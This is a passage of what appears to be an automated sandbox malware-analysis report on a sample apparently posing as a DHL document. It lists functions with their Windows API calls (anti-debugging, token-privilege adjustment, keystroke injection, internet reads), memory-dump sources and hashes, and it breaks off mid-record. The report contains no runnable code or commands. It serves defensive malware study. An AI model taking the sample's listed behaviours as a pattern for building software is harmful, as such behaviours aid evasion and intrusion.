                                                                                      • Instruction ID: 709c7c5738494f01ddce2079a20e8e3f67f2b4d746163255f78d8cca070c6f3b
                                                                                      • Opcode Fuzzy Hash: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                                                                      • Instruction Fuzzy Hash: DA311830B40208AFFF358B69CC05BFE7BE6AB46320F04421AF585561D2D7749981E7E2
                                                                                      Function 000ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 000ACE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000ACEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 000ACEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                      • Instruction ID: 3195a8257061a49819b6bc06c5f455b35058b98fc0a8b5f2c08c483d3dd7451e
                                                                                      • Opcode Fuzzy Hash: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                      • Instruction Fuzzy Hash: B8218C71500705AFFB70DFA5C948FAB77F8EB41354F11442AE64692152E774EE08CB90
                                                                                      Function 0009DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00075222), ref: 0009DBCE
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0009DBDD
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                      • Instruction ID: e4ffe73aef33fab172df3e90f9c5bc0ea6c221d3859b5199aa57823ddc31fc77
                                                                                      • Opcode Fuzzy Hash: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                                                                      • Instruction Fuzzy Hash: 6CF0A0B085091197AA206B78EC0DCAA77AC9F02334B144703F83AC20E0EBB45D559695
                                                                                      Function 00098298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000982AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($|
                                                                                      • API String ID: 1659193697-1631851259
                                                                                      • Opcode ID: ddfdb645a34b219a84174a9e96ffda63cd06e0b9ad661dbec6b3e989fa55d244
                                                                                      • Instruction ID: b9b2d131ab02e176b89267a87dd80ec98be62cdd15f6605baf76ee4fac305ed8
                                                                                      • Opcode Fuzzy Hash: ddfdb645a34b219a84174a9e96ffda63cd06e0b9ad661dbec6b3e989fa55d244
                                                                                      • Instruction Fuzzy Hash: A5323475A006059FCB28CF59C481AAAB7F0FF48710B15C46EE59ADB3A1EB70E981DB44
                                                                                      Function 000A5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A5CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A5D17
                                                                                      • FindClose.KERNEL32(?), ref: 000A5D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                      • Instruction ID: 30072ae2b5cbaf2666bdd022af64befb43fe4669595e3e3c7a16aa8fa64d1f33
                                                                                      • Opcode Fuzzy Hash: 6128ce7c68b90f9aef956b4d54d150d8455c62f6e939643da9f86a6c3c8a9bfb
                                                                                      • Instruction Fuzzy Hash: 9151AC74604A019FD724CF68C894E9AB7E4FF4A324F14855DE99A8B3A2CB30ED44CF91
                                                                                      Function 00062622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0006271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00062724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00062731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                      • Instruction ID: 97fe67eae1f1bf861ec7cdf1b585daeb4403c1a61fcc078f99034e33c714ee5e
                                                                                      • Opcode Fuzzy Hash: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                                                                      • Instruction Fuzzy Hash: 0531C27490121CABDB21DF68DC89BDDBBF8AF08310F5041EAE80CA6261E7349F858F45
                                                                                      Function 000A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A51DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000A52A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                      • Instruction ID: ada5487d4ef2401ac32852814e356de12f197dee6c7c0395b476acd7886b6c7d
                                                                                      • Opcode Fuzzy Hash: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                                                                      • Instruction Fuzzy Hash: 6F312B75A00518DFEB00DF95D894FADBBB4FF49314F088099E809AB362DB35E855CB90
                                                                                      Function 000916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                                                                        • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                      • GetLastError.KERNEL32 ref: 0009174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 577356006-0
                                                                                      • Opcode ID: 4159380e9ad5aecdd763d4f9720f2d0db149e97a98ab7ff92a285a0bbeb9f53b
                                                                                      • Instruction ID: 6be384abe43934d8b310967a58f647a50f1ee88259a9995bf6e12eca073dbf8b
                                                                                      • Opcode Fuzzy Hash: 4159380e9ad5aecdd763d4f9720f2d0db149e97a98ab7ff92a285a0bbeb9f53b
                                                                                      • Instruction Fuzzy Hash: CB1191B2904306AFE7189F54EC86DAAB7F9EF44714B24852EE05657251EB70BC428A24
                                                                                      Function 0009D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0009D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                      • Instruction ID: a8a006425d87557a7d75a4a2ff5e50afaa248dd72c7bdbbe8c041dc9e8c1d5c2
                                                                                      • Opcode Fuzzy Hash: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                                                                      • Instruction Fuzzy Hash: 22116175E45228BFEB208F95EC45FAFBFBCEB45B50F108116F908E7290D6704A059BA1
                                                                                      Function 00091663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000916A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 000916B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                      • Instruction ID: eec54f05c84f5e6298d82c16d8878a7a6cfe457ff7e34ea699d073a1d3d1048c
                                                                                      • Opcode Fuzzy Hash: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                                                                      • Instruction Fuzzy Hash: 3BF0F471950309FBEF00DFE4DC89EAEBBBCFB08604F504565E901E2181E774AA449A54
                                                                                      Function 00054CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D10
                                                                                      • ExitProcess.KERNEL32 ref: 00054D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                      • Instruction ID: 0606665a2986f318c4549e5d373c6b08165cf7829483aafcaea99607fbb75cef
                                                                                      • Opcode Fuzzy Hash: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                                                                      • Instruction Fuzzy Hash: 1EE0B631400148ABEF11AF54EE09E993B79FB41786B148018FC098B123CB3ADE86CAA0
                                                                                      Function 0006C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                                                                      • Instruction ID: bfd01b7f2bca449616e409a8ec0adf1c508854170d2354882763d68330e99317
                                                                                      • Opcode Fuzzy Hash: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                                                                      • Instruction Fuzzy Hash: D5413B725002196FEB20DFB9DC49DBB77BAEB84314F504269F945D7281E6709E41CB50
                                                                                      Function 0008D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0008D28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                      • Instruction ID: a7e09d8eb9178bf21b2e3c263573a7b02a93900d1eb6aa56d3618a50eada6a3e
                                                                                      • Opcode Fuzzy Hash: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                                                                      • Instruction Fuzzy Hash: CDD0C9B480112DEADBA0DB90EC88DDDB37CBB14305F100252F506A2040D73495488F10
                                                                                      Function 0005CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: acfec07cbdde247042bf01b9522f1f61f615afaf793eadb54fb7eb13df56bbd6
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: 4C021C71E002199FEF14CFA9C884AAEBBF1EF48315F258169D819E7381D731AE45CB94
                                                                                      Function 000A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A6918
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                      • Instruction ID: f682372b6bbaed95cf3608389238dfcee0e15adb55e0069f415de9f463bac683
                                                                                      • Opcode Fuzzy Hash: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                                                                      • Instruction Fuzzy Hash: 3F11D3356042009FD710CF69C484E16BBE4FF85328F08C6A9E4698F2A2CB31EC05CB90
                                                                                      Function 000A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                                                                      • Instruction ID: 30d707e595800fcb870e2b4b9eaef7015f65e8c3b8e67aa82bf182a9068ad687
                                                                                      • Opcode Fuzzy Hash: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                                                                      • Instruction Fuzzy Hash: 00F0E5B16043282AF72057A69C4DFEF3AAEEFC5761F000175F509D22D1D9A09904C6B0
                                                                                      Function 0009B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0009B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
